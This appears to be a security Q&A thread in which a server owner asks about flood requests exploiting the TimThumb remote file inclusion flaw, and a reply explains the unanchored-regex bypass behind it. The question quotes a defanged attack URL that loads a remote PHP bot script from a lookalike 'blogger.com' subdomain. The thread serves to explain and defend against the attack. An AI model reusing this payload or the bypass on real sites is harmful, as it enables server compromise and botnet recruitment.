My server (mediaquarter.at) is currently being DDoSed by requests like this (with some minor variations): hXXp://www.mediaquarter.at/http://www.madeineurope.org.uk/media/functions/timthumb/timthumb.php?src=http://blogger.com.midislandrental.com/.mods/sh.php (URL “deactivated” so no one can accidentally click it)
Beware if you try to download the referenced PHP file: In the preg_replace there’s the /e switch activated and the code contains multiple eval statements – clean that up before you want to take a look at it! Looks like pBot, you can find more information about it here: http://www.offensivecomputing.net/?q=node/1417
TimThumb is vulnerable to remote file inclusion (http://eromang.zataz.com/2011/09/20/wordpress-timthumb-rfi-vulnerability-used-as-botnet-recruitment-vector/) – seems to be pretty widespread in WordPress. So I would understand somebody calling hXXp://www.madeineurope.org.uk/media/functions/timthumb/timthumb.php?src=http://blogger.com.midislandrental.com/.mods/sh.php to exploit the vulnerability.
However, what’s the point of trying to call it via another website (mediaquarter.at), which only results in a 404 error message? Additionally my server isn’t running WordPress, but SilverStripe instead so this seems to be pretty pointless.
Is this just an error / stupid on the attacker’s side or am I overlooking some kind of attack vector here?
PS: The server is just some cheap web hosting and I can’t reach it at all, so I’m not able to verify if there are any changes on the system.
If you don’t have the timthumb.php file then you’re not vulnerable plain and simple. This is a very exotic vulnerability that I have studied in depth because (so far) its one of a kind. You should read the exploits written from the attacker’s point of view.
In short, its caching images from “trusted” websites like youtube.com and blogger.com. However this regular expression is poorly written and isn’t bound to the end of the string. its trivial to change your subdomain to fool this regex check. This is why the attacker’s domain name is
blogger.com.midislandrental.com
.The reason why you are getting DDoS’ed is probably because the fetch for timthumb.php isn’t returning a 404 or the massive botnet that is spreading via timthumb.php is incorrectly fingerprinting you as being vulnerable. You could be showing up in a google dork for bots trying to find vulnerable hosts.